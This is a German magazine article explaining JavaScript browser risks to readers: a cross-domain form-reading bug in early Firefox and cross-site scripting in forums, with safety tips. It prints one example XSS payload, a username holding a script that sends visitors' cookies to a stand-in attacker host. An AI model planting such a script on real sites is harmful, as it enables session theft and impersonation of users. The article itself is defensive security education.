Code aus dem Internet

Per JavaScript lassen sich Formular-Werte auslesen (Abbildung 3) – auch aus Formularen in einem anderen Fenster. Da das Gefährdungspotential offensichtlich ist (es müssen nur die Online-Banking-Seite und die Seite eines Angreifers gleichzeitig offen sein, damit der Angreifer auf alle Ihre Eingaben Zugriff hat), schränkt JavaScript diesen fenster- oder frameübergreifende Zugriff ein: Er funktioniert nur, wenn beide Seiten/Frames von der gleichen Domain stammen.

Doch grau ist alle Theorie: Immerhin bis einschließlich Firefox 1.0 war diese wichtige Einschränkung nicht richtig implementiert. Zumindest aktuelle Konqueror- oder Opera-Versionen weisen diese Verwundbarkeit nicht auf. Folgendes Szenario wäre mit Firefox < 1.0 realisierbar: Ein Angreifer schickt per Mail einen präparierten Link. Dieser öffnet zwar Ihre Bank-Seite, im Hintergrund jedoch zusätzlich ein kleines Popup. Dieses nicht sichtbare Fenster kann dann alle Eingaben "mitschreiben" und dem Angreifer zusenden.

Abbildung 3: JavaScript kann Eingaben aus Formularfeldern auslesen – durch einen Bug teilweise auch über Domaingrenzen hinweg. So kann ein Angreifer die Daten an seine eigene Adresse verschicken.

Bedrohung JavaScript

  • Gehen Sie nie über Links aus zweifelharter Quelle (sprich: Mails; Internet-Seite, deren Seriosität nicht zweifelsfrei feststeht) auf Seiten, die sicherheitskritische Anwendungen bereitstellen. Über präparierte Links kann leicht bösartiger JavaScript-Code eingeschleust werden.
  • Verwenden Sie nur Bookmarks, die Sie selbst erstellt haben.
  • Starten Sie den Browser neu, um sicherzustellen, dass nicht fehlerhafterweise noch JavaScript-Code aus zuvor besuchten Seiten aktiv ist.

Die Hintertür

Webanwendungen wie Foren spielen Angreifern oft in die Hände: Häufig lässt sich über die Hintertüre für die Seitenbesucher gefährlicher JavaScript-Code einschleusen. So könnte ein Angreifer versuchen, sich mit dem Benutzernamen BoeserBube <script>(new Image).src="http://www.angreifer.de/spy.php?sniff=+document.cookie";</script>) anzumelden. Möglich, dass die Webanwendung den JavaScript-Anteil ausfiltert oder den Namen wegen seiner Länge zurückweist. Wenn jedoch nicht, so steht auf jeder Seite, auf der der Benutzername angezeigt wird, ein Skript-Code, der die Cookies der Seitenbesucher ausliest (document.cookie) und diese als Parameter (sniff=[...]) an http://www.angreifer.de übergibt. Sicherheits-Checks des Browsers können hier nichts ausrichten: Der JavaScript-Code steht auf der Seite, zu der die Cookies gehören. Aus Sicht des Browser ist der Zugriff auf die Cookies legitim. Die meisten Webanwendungen nutzen Cookies, um angemeldete Benutzer zu identifizieren (Abbildung 4). Wer Ihr Zugriff auf Ihr Session-Cookie hat, kann "in Ihrem Namen handeln".

Abbildung 4: Webanwendungen nutzen Cookies, um verschiedene Benutzer auseinander zu halten. Gelangen diese Schlüsseldateien durch Cross-Site-Scripting in die Hände eine Angreifers, so kann dieser Ihre Identität annehmen kann.

LinuxCommunity kaufen

Einzelne Ausgabe
 
Abonnements
 
TABLET & SMARTPHONE APPS
Bald erhältlich
Get it on Google Play

Deutschland

Ähnliche Artikel

Kommentare

Infos zur Publikation

LU 09/2016: Ciao, Windows!

Digitale Ausgabe: Preis € 5,99
(inkl. 19% MwSt.)

LinuxUser erscheint monatlich und kostet 5,95 Euro (mit DVD 8,50 Euro). Weitere Infos zum Heft finden Sie auf der Homepage.

Das Jahresabo kostet ab 86,70 Euro. Details dazu finden Sie im Computec-Shop. Im Probeabo erhalten Sie zudem drei Ausgaben zum reduzierten Preis.

Bei Google Play finden Sie digitale Ausgaben für Tablet & Smartphone.

HINWEIS ZU PAYPAL: Die Zahlung ist ohne eigenes Paypal-Konto ganz einfach per Kreditkarte oder Lastschrift möglich!

Aktuelle Fragen

NOKIA N900 einziges Linux-Smartphone? Kein Support mehr
Wimpy *, 28.08.2016 11:09, 1 Antworten
Ich habe seit vielen Jahren ein Nokia N900 mit Maemo-Linux. Es funktioniert einwandfrei, aber ich...
Scannen nicht möglich
Werner Hahn, 19.08.2016 22:33, 3 Antworten
Laptop DELL Latitude E6510 mit Ubuntu 16,04, Canon Pixma MG5450. Das Drucken funktioniert, Scann...
Wie kann man das berichtigen
Udo Muelle, 17.07.2016 20:39, 1 Antworten
Fehlschlag beim Holen von http://extra.linuxmint.com/dists/rosa/main/binary-i386/Packages Hash-S...
Installation Genimotion
Horst Müller, 15.07.2016 17:00, 1 Antworten
Hallo, ich kann Genimotion nicht installieren. Folgende Fehlermeldung habe ich beim Aufruf erh...
Probleme beim Hochfahren der Terastaion 5400 mit Unix-Distrib
Sheldon Cooper, 10.07.2016 09:32, 0 Antworten
Hallo ihr lieben, habe seit zwei Tagen das Problem, das das NAS (Raid5) nicht mehr sauber hoch...